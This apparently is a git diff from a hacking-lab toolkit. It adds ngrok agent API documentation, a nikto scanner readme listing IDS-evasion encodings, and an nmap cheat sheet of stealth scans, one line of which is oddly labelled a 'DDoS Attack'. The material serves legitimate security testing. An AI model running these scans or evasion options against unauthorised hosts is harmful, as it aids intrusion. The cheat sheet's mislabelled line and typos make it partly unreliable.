+          "config": {
+              "addr": "localhost:80",
+              "inspect": true,
+          },
+          "metrics": {
+              "conns": {
+                  "count": 0,
+                  "gauge": 0,
+                  "rate1": 0,
+                  "rate5": 0,
+                  "rate15": 0,
+                  "p50": 0,
+                  "p90": 0,
+                  "p95": 0,
+                  "p99": 0
+              },
+              "http": {
+                  "count": 0,
+                  "rate1": 0,
+                  "rate5": 0,
+                  "rate15": 0,
+                  "p50": 0,
+                  "p90": 0,
+                  "p95": 0,
+                  "p99": 0
+              }
+          }
+      },
+      ...
+  ],
+  "uri": "/api/tunnels"
+}
+
+

Start tunnel

+

Dynamically starts a new tunnel on the ngrok client. The request body parameters are the same as those you would + use to define the tunnel in the configuration file. +

+
Request
+
POST/api/tunnels +
+
Parameters
+

Parameter names and behaviors are identical to those those defined in the configuration file. + Use the tunnel definitions section as a reference for configuration + parameters and their behaviors. +

+
Example request body
+
+
{
+  "addr": "22",
+  "proto": "tcp",
+  "name": "ssh"
+}
+
+
Response
+

201 status code with a response body describing the started tunnel. + See the Tunnel detail resource for docs on the parameters of the response object +

+
Example Response
+
+
{
+  "name": "",
+  "uri": "/api/tunnels/",
+  "public_url": "tcp://0.tcp.ngrok.io:53476",
+  "proto": "tcp",
+  "config": {
+      "addr": "localhost:22",
+      "inspect": false,
+  },
+  "metrics": {
+      "conns": {
+          "count": 0,
+          "gauge": 0,
+          "rate1": 0,
+          "rate5": 0,
+          "rate15": 0,
+          "p50": 0,
+          "p90": 0,
+          "p95": 0,
+          "p99": 0
+      },
+      "http": {
+          "count": 0,
+          "rate1": 0,
+          "rate5": 0,
+          "rate15": 0,
+          "p50": 0,
+          "p90": 0,
+          "p95": 0,
+          "p99": 0
+      }
+  }
+}
+
+

Tunnel detail

+

Get status and metrics about the named running tunnel

+
Request
+
GET/api/tunnels/:name +
+
Response
+
Example Response
+
+
{
+  "name": "command_line",
+  "uri": "/api/tunnels/command_line",
+  "public_url": "https://ac294125.ngrok.io",
+  "proto": "https",
+  "config": {
+      "addr": "localhost:80",
+      "inspect": true,
+  },
+  "metrics": {
+      "conns": {
+          "count": 0,
+          "gauge": 0,
+          "rate1": 0,
+          "rate5": 0,
+          "rate15": 0,
+          "p50": 0,
+          "p90": 0,
+          "p95": 0,
+          "p99": 0
+      },
+      "http": {
+          "count": 0,
+          "rate1": 0,
+          "rate5": 0,
+          "rate15": 0,
+          "p50": 0,
+          "p90": 0,
+          "p95": 0,
+          "p99": 0
+      }
+  }
+}
+
+

Stop tunnel

+

Stop a running tunnel

+
Request
+
DELETE/api/tunnels/:name +
+
Response
+

204 status code with an empty body

+

List Captured Requests

+

Returns a list of all HTTP requests captured for inspection. This will only return requests + that are still in memory (ngrok evicts captured requests when their memory usage exceeds inspect_db_size) +

+
Request
+
GET/api/requests/http +
+
Query Parameters
+ + + + + + + + + +
limit + maximum number of requests to return
tunnel_name + filter requests only for the given tunnel name
+
Example Request
+
+
curl http://localhost:4040/api/requests/http?limit=50
+ +
+
Response
+ + + + + +
requests + list of captured requests. See the Captured Request Detail resource for docs on the request objects
+
Example Response
+
+
{
+  "uri": "/api/requests/http",
+  "requests": [
+      {
+          "uri": "/api/requests/http/548fb5c700000002",
+          "id": "548fb5c700000002",
+          "tunnel_name": "command_line (http)",
+          "remote_addr": "192.168.100.25",
+          "start": "2014-12-15T20:32:07-08:00",
+          "duration": 3893202,
+          "request": {
+              "method": "GET",
+              "proto": "HTTP/1.1",
+              "headers": {
+                  "Accept": [
+                      "*/*"
+                  ],
+                  "Accept-Encoding": [
+                      "gzip, deflate, sdch"
+                  ],
+                  "Accept-Language": [
+                      "en-US,en;q=0.8"
+                  ],
+                  "Connection": [
+                      "keep-alive"
+                  ],
+                  "User-Agent": [
+                      "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
+                  ],
+                  "X-Original-Host": [
+                      "c159663f.ngrok.io"
+                  ]
+              },
+              "uri": "/favicon.ico",
+              "raw": ""
+          },
+          "response": {
+              "status": "502 Bad Gateway",
+              "status_code": 502,
+              "proto": "HTTP/1.1",
+              "headers": {
+                  "Content-Length": [
+                      "1716"
+                  ]
+              },
+              "raw": "",
+          }
+      },
+      ...
+  ]
+}
+
+

Replay Captured Request

+

Replays a request against the local endpoint of a tunnel

+
Request
+
POST/api/requests/http +
+
Parameters
+ + + + + + + + + +
id + id of request to replay
tunnel_name + name of the tunnel to play the request against. If unspecified, the request is played against the same tunnel it was recorded on
+
Example Request
+
+
curl -H "Content-Type: application/json" -d '{"id": "548fb5c700000002"}' http://localhost:4040/api/requests/http
+ +
+
Response
+

204 status code with an empty body

+

Delete Captured Requests

+

Deletes all captured requests

+
Request
+
DELETE/api/requests/http +
+
Response
+

204 status code with no response body

+

Captured Request Detail

+

Returns metadata and raw bytes of a captured request. The raw data is base64-encoded in the JSON response. + The response value maybe null if the local server has not yet responded to a request. +

+
Request
+
GET/api/requests/http/:request_id +
+
Response
+
Example Response
+
+
{
+  "uri": "/api/requests/http/548fb5c700000002",
+  "id": "548fb5c700000002",
+  "tunnel_name": "command_line (http)",
+  "remote_addr": "192.168.100.25",
+  "start": "2014-12-15T20:32:07-08:00",
+  "duration": 3893202,
+  "request": {
+      "method": "GET",
+      "proto": "HTTP/1.1",
+      "headers": {
+          "Accept": [
+              "*/*"
+          ],
+          "Accept-Encoding": [
+              "gzip, deflate, sdch"
+          ],
+          "Accept-Language": [
+              "en-US,en;q=0.8"
+          ],
+          "Connection": [
+              "keep-alive"
+          ],
+          "User-Agent": [
+              "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36"
+          ],
+          "X-Original-Host": [
+              "c159663f.ngrok.io"
+          ]
+      },
+      "uri": "/favicon.ico",
+      "raw": ""
+  },
+  "response": {
+      "status": "502 Bad Gateway",
+      "status_code": 502,
+      "proto": "HTTP/1.1",
+      "headers": {
+          "Content-Length": [
+              "1716"
+          ]
+      },
+      "raw": "",
+  }
+}
+
+
+

ngrok HTTP API

+

We expose an HTTP API that grants programmatic access to + all of ngrok's resources.

+

A basic understanding of ngrok and its features is strongly encouraged before using this API: + the ngrok.com HTTP API. +

+

+ This HTTP API is part of our Beta suite of features and any user subscribed to a paid ngrok plan can request access. Please note, we may be charging for some features in our Beta suite once they are officially released. +

+ +

Errors

+

When something goes wrong, we report an error code: in the agent, our REST API, or + at our edge.

+

You can see a comprehensive list of those errors + in our error index. +

+ +

Guides

+

We have written some guides to walk you through some common workflows.

+ + +

Backward Compatibility

+

ngrok makes promises about the compatibility and stability of its interfaces so that you can + can confidently build integrations on top and know what changes to expect when upgrading to newer versions. +

+

Compatibility promise

+
    +
  • Point Release (2.0.0 -> 2.0.1) - ngrok promises no breaking changes across point releases
  • +
  • Minor Version Change (2.0 -> 2.1) - ngrok may make small changes that break + compatibility for functionality that affects very small minority of users across a minor version change. +
  • +
  • Major Version Change (2.0 -> 3.0) - ngrok makes no promise that any interfaces are stable across a major version change.
  • +
+

What interfaces are subject to the promise?

+
    +
  • The ngrok command line interface: the commands and their options
  • +
  • The ngrok configuration file
  • +
  • The ngrok agent API
  • +
+

Anything other interface like the logging format or the web UI is not subject to any compatibility + promise and may change without warning between versions. +

+

Changes in 2.3

+

If asked to forward to port 443, ngrok will now automatically forward HTTPS traffic instead of HTTP. This change would + only affect you if you previously ran a server accepting unencrypted HTTP on port 443. To workaround this, you may specify an explicit http + URL if you need the old behavior: ngrok http http://localhost:443. +

+

If run under sudo, the ngrok client previously consulted the sudo-ing user's home directory file when looking for its default configuration file. + It now consults the home directory of the assumed user. To workaround this, you may specify an explicit configuration file location with + the -config option. +

+

Changes in 2.2

+

The ngrok agent API no longer accepts application/x-www-form-urlencoded request bodies. In practice, this only affects the /api/requests/http/:id endpoint because posting to the /api/tunnels endpoint with this type of request body previously caused ngrok to crash.

+

This change was made to help protect against maliciously crafted web pages that could cause a user to inadvertently interact with their local ngrok API.

+

Changes in 2.1

+

Behavior changes for http and tls tunnels defined in the configuration file or started via the API that do not have + a subdomain or hostname property. +

+
+
tunnels:
+  webapp:
+  proto: http
+  addr: 80
+
+

Given this example tunnel configuration, behavior will change in the following ways.

+
Old Behavior
+

Starts a tunnel using the name of the tunnel as the subdomain resulting in the URL http://webapp.ngrok.io

+
New Behavior
+

Starts a tunnel with a random subdomain, for example a URL like http://d95211d2.ngrok.io

+
How to keep the old behavior
+

Add a subdomain property with the same name as the tunnel:

+
+
tunnels:
+  webapp:
+  proto: http
+  addr: 80
+  subdomain: webapp
+
+

This behavior changed in order to make it possible to launch tunnels with random domains. This was preventing the use of the configuration file and agent API to free tier users.

+ +

ngrok 1.x sunset

+

The ngrok 1.X service shut down on April 4, 2016. More details can be found on the ngrok 1.x sunset announcement

+ +

FAQ

+

What information is stored about my tunnels?

+

+ ngrok does not log or store any data transmitted through your tunneled connections. ngrok does log some information about the connections which are used for debugging purposes and metrics like the name of the tunnel and the duration of connections. For complete end-to-end security, use a TLS tunnel. +

+

How do I pronounce ngrok?

+

+ en-grok +

+ + + + + + + + + + + + + + + + + + + diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nikto.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nikto.md new file mode 100755 index 00000000..f2f56b08 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nikto.md @@ -0,0 +1,100 @@ +nikto +===== + +Nikto web server scanner - https://cirt.net/Nikto2 + +Full documentation - https://cirt.net/nikto2-docs/ + +Basic usage: + +``` + Options: + -ask+ Whether to ask about submitting updates + yes Ask about each (default) + no Don't ask, don't send + auto Don't ask, just send + -Cgidirs+ Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/" + -config+ Use this config file + -Display+ Turn on/off display outputs: + 1 Show redirects + 2 Show cookies received + 3 Show all 200/OK responses + 4 Show URLs which require authentication + D Debug output + E Display all HTTP errors + P Print progress to STDOUT + S Scrub output of IPs and hostnames + V Verbose output + -dbcheck Check database and other key files for syntax errors + -evasion+ Encoding technique: + 1 Random URI encoding (non-UTF8) + 2 Directory self-reference (/./) + 3 Premature URL ending + 4 Prepend long random string + 5 Fake parameter + 6 TAB as request spacer + 7 Change the case of the URL + 8 Use Windows directory separator (\) + A Use a carriage return (0x0d) as a request spacer + B Use binary value 0x0b as a request spacer + -Format+ Save file (-o) format: + csv Comma-separated-value + htm HTML Format + msf+ Log to Metasploit + nbe Nessus NBE format + txt Plain text + xml XML Format + (if not specified the format will be taken from the file extension passed to -output) + -Help Extended help information + -host+ Target host + -IgnoreCode Ignore Codes--treat as negative responses + -id+ Host authentication to use, format is id:pass or id:pass:realm + -key+ Client certificate key file + -list-plugins List all available plugins, perform no testing + -maxtime+ Maximum testing time per host + -mutate+ Guess additional file names: + 1 Test all files with all root directories + 2 Guess for password file names + 3 Enumerate user names via Apache (/~user type requests) + 4 Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests) + 5 Attempt to brute force sub-domain names, assume that the host name is the parent domain + 6 Attempt to guess directory names from the supplied dictionary file + -mutate-options Provide information for mutates + -nointeractive Disables interactive features + -nolookup Disables DNS lookups + -nossl Disables the use of SSL + -no404 Disables nikto attempting to guess a 404 page + -output+ Write output to this file ('.' for auto-name) + -Pause+ Pause between tests (seconds, integer or float) + -Plugins+ List of plugins to run (default: ALL) + -port+ Port to use (default 80) + -RSAcert+ Client certificate file + -root+ Prepend root value to all requests, format is /directory + -Save Save positive responses to this directory ('.' for auto-name) + -ssl Force ssl mode on port + -Tuning+ Scan tuning: + 1 Interesting File / Seen in logs + 2 Misconfiguration / Default File + 3 Information Disclosure + 4 Injection (XSS/Script/HTML) + 5 Remote File Retrieval - Inside Web Root + 6 Denial of Service + 7 Remote File Retrieval - Server Wide + 8 Command Execution / Remote Shell + 9 SQL Injection + 0 File Upload + a Authentication Bypass + b Software Identification + c Remote Source Inclusion + x Reverse Tuning Options (i.e., include all except specified) + -timeout+ Timeout for requests (default 10 seconds) + -Userdbs Load only user databases, not the standard databases + all Disable standard dbs and load only user dbs + tests Disable only db_tests and load udb_tests + -until Run until the specified time or duration + -update Update databases and plugins from CIRT.net + -useproxy Use the proxy defined in nikto.conf + -Version Print plugin and database versions + -vhost+ Virtual host (for Host header) + + requires a value +``` diff --git a/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nmap.md b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nmap.md new file mode 100755 index 00000000..ec220989 --- /dev/null +++ b/.deb/home/.local/etc/i-Haklab/Tools/Readme/N/nmap.md @@ -0,0 +1,196 @@ + +:::::::::::::::::::::::::::::::::::::: NMAP QUICK GUIDE :::::::::::::::::::::::::::::::::::::: + +nmap -iL ips.txt | Scan ips in .txt file +nmap -p | Scan an specific port +nmap -p 20-30 | Scan ports between 20 at 30 +nmap -p- | Scan all 65,535 ports +nmap -F | Fast scan +nmap -sT | Scan TCP connect +nmap -sS | Scan sync(puertos abiertos) +nmap -sP | Localiza equipos activos +nmap -sN | Null scan +nmap -sF | Scan FIN +nmap -v | Verbose +nmap -sU | Scan UDP +nmap -sX | scan XMAS +nmap -A | All=show SO/type of service +nmap -sV | Scan only active service +nmap -sV --version-intesity 0-5 | Add intesity level at scan +nmap -P0 -p- -sL | Scan idle +sudo nmap -sP | Show all IPs in the network +nmap -oN | Save results in .txt file +nmap -oX | Sava results in .xml file +nmap -sC | Run an specific script +nmap --script-help=ssl-heartbleed https://m.example.com | Scan some webpage +nmap --script=msrpc-enum | enumerar servicios de Microsoft +nmap --script=all | Scan all scripts +nmap -sU -A -PN -n -pU68 --script=all 192.168.0.0 | DDoS Attack +## NMAP CHEAT SHEET + +- Target Specification +```bash +nmap 192.168.1.1 #Scan a single IP +nmap 192.168.1.1 192.168.2.1 #Scan specific IPs +nmap 192.168.1.1-254 #Scan a range +nmap scanme.nmap.org #Scan a domain +nmap 192.168.1.0/24 #Scan using CIDR notation +nmap -iL targets.txt #Scan targets from a file +nmap -iR 100 #Scan 100 random hosts +nmap –exclude 192.168.1.1 #Exclude listed hosts +``` + +- Nmap Scan Techniques +```bash +nmap 192.168.1.1 -sS #TCP SYN port scan (Default) +nmap 192.168.1.1 -sT #TCP connect port scan (Default without root privilege) +nmap 192.168.1.1 -sU #UDP port scan +nmap 192.168.1.1 -sA #TCP ACK port scan +nmap 192.168.1.1 -sW #TCP Window port scan +nmap 192.168.1.1 -sM #TCP Maimon port scan +``` + +- Host Discovery +```bash +nmap 192.168.1.1-3 -sL #No Scan. List targets only +nmap 192.168.1.1/24 -sn #Disable port scanning. Host discovery only. +nmap 192.168.1.1-5 -Pn #Disable host discovery. Port scan only. +nmap 192.168.1.1-5 -PS22-25,80 #TCP SYN discovery on port x. Port 80 by default +nmap 192.168.1.1-5 -PA22-25,80 #TCP ACK discovery on port x. Port 80 by default +nmap 192.168.1.1-5 -PU53 #UDP discovery on port x.Port 40125 by default +nmap 192.168.1.1-1/24 -PR #ARP discovery on local network +nmap 192.168.1.1 -n #Never do DNS resolution +``` + +- Port Specification +```bash +nmap 192.168.1.1 -p 21 #Port scan for port x +nmap 192.168.1.1 -p 21-100 #Port range +nmap 192.168.1.1 -p U:53,T:21-25,80 #Port scan multiple TCP and UDP ports +nmap 192.168.1.1 -p- #Port scan all ports +nmap 192.168.1.1 -p http,https #Port scan from service name +nmap 192.168.1.1 -F #Fast port scan (100 ports) +nmap 192.168.1.1 –top-ports 2000 #Port scan the top x ports +nmap 192.168.1.1 -p-65535 #Leaving off initial port in range makes the scan start at port 1 +nmap 192.168.1.1 -p0- #Leaving off end port in range makes the scan go through to port 65535 +``` + +- Service and Version Detection +```bash +nmap 192.168.1.1 -sV #Attempts to determine the version of the service running on port +nmap 192.168.1.1 -sV –version-intensity 8 #Intensity level 0 to 9. Higher number increases possibility of correctness +nmap 192.168.1.1 -sV –version-light #Enable light mode. Lower possibility of correctness. Faster +nmap 192.168.1.1 -sV –version-all #Enable intensity level 9. Higher possibility of correctness. Slower +nmap 192.168.1.1 -A #Enables OS detection(-O), version detection(-sV), script scanning(-sC), and traceroute +``` + +- OS Detection +```bash +nmap 192.168.1.1 -O #Remote OS detection using TCP/IP stack fingerprinting +nmap 192.168.1.1 -O –osscan-limit #If at least one open and one closed TCP port are not found it will not try OS detection against host +nmap 192.168.1.1 -O –osscan-guess #Makes Nmap guess more aggressively +nmap 192.168.1.1 -O –max-os-tries 1 #Set the maximum number x of OS detection tries against a target +nmap 192.168.1.1 -A #Enables OS detection, version detection, script scanning, and traceroute +``` + +- Timing and Performance +```bash +nmap 192.168.1.1 -T0 #Paranoid (0) Intrusion Detection System evasion +nmap 192.168.1.1 -T1 #Sneaky (1) Intrusion Detection System evasion +nmap 192.168.1.1 -T2 #Polite (2) slows down the scan to use less bandwidth and use less target machine resources +nmap 192.168.1.1 -T3 #Normal (3) which is default speed +nmap 192.168.1.1 -T4 #Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network +nmap 192.168.1.1 -T5 #Insane (5) speeds scan; assumes you are on an extraordinarily fast network +``` + +- Timing and Performance Switches +```bash +–host-timeout